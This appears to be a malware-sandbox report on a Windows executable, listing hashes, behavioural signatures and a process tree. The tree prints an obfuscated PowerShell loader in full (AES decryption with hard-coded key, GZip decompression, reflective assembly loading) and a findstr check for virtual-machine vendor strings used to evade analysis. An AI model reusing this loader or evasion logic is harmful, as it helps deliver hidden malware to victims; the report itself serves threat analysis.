Analysis
-
max time kernel
129s -
max time network
123s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
23/08/2024, 17:29
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20240729-en
General
-
Target
file.exe
-
Size
2.2MB
-
MD5
f06c54ee336f52fdc772b069a87f11a3
-
SHA1
aeac1f167a0416708104edc96aa7d451e0b3ddfc
-
SHA256
80dfa383874c9458bd67b255fde1a6d6181807bda659ce70f989784094dba918
-
SHA512
8e75dc2787bc84efcc3deb688628d74cbdfefe8c851d97c916b4bfc177adb2436b0b6decfffb9262089d1b0ab7501e95090f1837ffed3d330164bc2532ecf5e8
-
SSDEEP
49152:cEHtPBsU7o5PiiTcMGCVmbikTDKytL5pNYtCLzILWMhS+/Kpo0zPV:cyDvoPia7VmJKy48Vn+/gdV
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3608 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation file.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2364 3608 WerFault.exe 95 -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language file.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3608 powershell.exe 3608 powershell.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 3156 WMIC.exe Token: SeSecurityPrivilege 3156 WMIC.exe Token: SeTakeOwnershipPrivilege 3156 WMIC.exe Token: SeLoadDriverPrivilege 3156 WMIC.exe Token: SeSystemProfilePrivilege 3156 WMIC.exe Token: SeSystemtimePrivilege 3156 WMIC.exe Token: SeProfSingleProcessPrivilege 3156 WMIC.exe Token: SeIncBasePriorityPrivilege 3156 WMIC.exe Token: SeCreatePagefilePrivilege 3156 WMIC.exe Token: SeBackupPrivilege 3156 WMIC.exe Token: SeRestorePrivilege 3156 WMIC.exe Token: SeShutdownPrivilege 3156 WMIC.exe Token: SeDebugPrivilege 3156 WMIC.exe Token: SeSystemEnvironmentPrivilege 3156 WMIC.exe Token: SeRemoteShutdownPrivilege 3156 WMIC.exe Token: SeUndockPrivilege 3156 WMIC.exe Token: SeManageVolumePrivilege 3156 WMIC.exe Token: 33 3156 WMIC.exe Token: 34 3156 WMIC.exe Token: 35 3156 WMIC.exe Token: 36 3156 WMIC.exe Token: SeIncreaseQuotaPrivilege 3156 WMIC.exe Token: SeSecurityPrivilege 3156 WMIC.exe Token: SeTakeOwnershipPrivilege 3156 WMIC.exe Token: SeLoadDriverPrivilege 3156 WMIC.exe Token: SeSystemProfilePrivilege 3156 WMIC.exe Token: SeSystemtimePrivilege 3156 WMIC.exe Token: SeProfSingleProcessPrivilege 3156 WMIC.exe Token: SeIncBasePriorityPrivilege 3156 WMIC.exe Token: SeCreatePagefilePrivilege 3156 WMIC.exe Token: SeBackupPrivilege 3156 WMIC.exe Token: SeRestorePrivilege 3156 WMIC.exe Token: SeShutdownPrivilege 3156 WMIC.exe Token: SeDebugPrivilege 3156 WMIC.exe Token: SeSystemEnvironmentPrivilege 3156 WMIC.exe Token: SeRemoteShutdownPrivilege 3156 WMIC.exe Token: SeUndockPrivilege 3156 WMIC.exe Token: SeManageVolumePrivilege 3156 WMIC.exe Token: 33 3156 WMIC.exe Token: 34 3156 WMIC.exe Token: 35 3156 WMIC.exe Token: 36 3156 WMIC.exe Token: SeDebugPrivilege 3608 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 4628 wrote to memory of 3136 4628 file.exe 87 PID 4628 wrote to memory of 3136 4628 file.exe 87 PID 4628 wrote to memory of 3136 4628 file.exe 87 PID 3136 wrote to memory of 3156 3136 cmd.exe 90 PID 3136 wrote to memory of 3156 3136 cmd.exe 90 PID 3136 wrote to memory of 3156 3136 cmd.exe 90 PID 3136 wrote to memory of 2944 3136 cmd.exe 91 PID 3136 wrote to memory of 2944 3136 cmd.exe 91 PID 3136 wrote to memory of 2944 3136 cmd.exe 91 PID 3136 wrote to memory of 1964 3136 cmd.exe 94 PID 3136 wrote to memory of 1964 3136 cmd.exe 94 PID 3136 wrote to memory of 1964 3136 cmd.exe 94 PID 3136 wrote to memory of 3608 3136 cmd.exe 95 PID 3136 wrote to memory of 3608 3136 cmd.exe 95 PID 3136 wrote to memory of 3608 3136 cmd.exe 95
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7z788F8214\onitest.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic diskdrive get Manufacturer,Model3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3156
-
-
C:\Windows\SysWOW64\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"innotek GmbH" /c:"VirtualBox" /c:"Compute Engine" /c:"Supermicro"3⤵
- System Location Discovery: System Language Discovery
PID:2944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function VxWFO($fEFcX){ $wYcHJ=[System.Security.Cryptography.Aes]::Create(); $wYcHJ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $wYcHJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $wYcHJ.Key=[System.Convert]::FromBase64String('mbloPEknf1TwaS6SK0+bcsM1DbtN30rzhG1qypXEfHs='); $wYcHJ.IV=[System.Convert]::FromBase64String('me2XyZir0Pd2lyw9aW1tVQ=='); $DRUeH=$wYcHJ.CreateDecryptor(); $aPWFg=$DRUeH.TransformFinalBlock($fEFcX, 0, $fEFcX.Length); $DRUeH.Dispose(); $wYcHJ.Dispose(); $aPWFg;}function NMDkA($fEFcX){ IEX '$jtKnX=New-Object System.IO.M*em*or*yS*tr*ea*m(,$fEFcX);'.Replace('*', ''); IEX '$qIDMr=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$WzKKY=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($jtKnX, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $WzKKY.CopyTo($qIDMr); $WzKKY.Dispose(); $jtKnX.Dispose(); $qIDMr.Dispose(); $qIDMr.ToArray();}function sFVdN($fEFcX,$riShO){ IEX '$hexoC=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$fEFcX);'.Replace('*', ''); IEX '$kwGhc=$hexoC.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$kwGhc.*I*n*v*o*k*e*($null, $riShO);'.Replace('*', '');}$zbcdR = 'C:\Users\Admin\AppData\Local\Temp\7z788F8214\onitest.bat';$host.UI.RawUI.WindowTitle = $zbcdR;$uAjCx=[System.IO.File]::ReadAllText($zbcdR).Split([Environment]::NewLine);foreach ($xhrJZ in $uAjCx) { if ($xhrJZ.StartsWith(':: ')) { $wfcOv=$xhrJZ.Substring(3); break; }}$ZVkiY=[string[]]$wfcOv.Split('\');IEX '$OCqxy=NMDkA (VxWFO ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($ZVkiY[0])));'.Replace('*', '');IEX '$YxHLS=NMDkA (VxWFO ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ZVkiY[1])));'.Replace('*', '');sFVdN $OCqxy $null;sFVdN $YxHLS (,[string[]] ('')); "3⤵
- System Location Discovery: System Language Discovery
PID:1964
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3608 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 17964⤵
- Program crash
PID:2364
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3608 -ip 36081⤵PID:3204
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.5MB
MD5d01d6cdfbc82758617945d545d134145
SHA1e64bd9b5e7fd0ccc63a0c3a78c5a2dcab6e54903
SHA256f8d2db6c5112ec887156b6184a6cc4a93ac88f3896422fec03034bd9a5575d9a
SHA512fe2d0ac4c341ddff3dc4ce22cd4eab83e06c87612a462ee11d7c83b666a2b68182e6c78b0d18b8b3fce4e7e5848a929b6fe4fa8ab4c2354b531008a7c6edf717
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82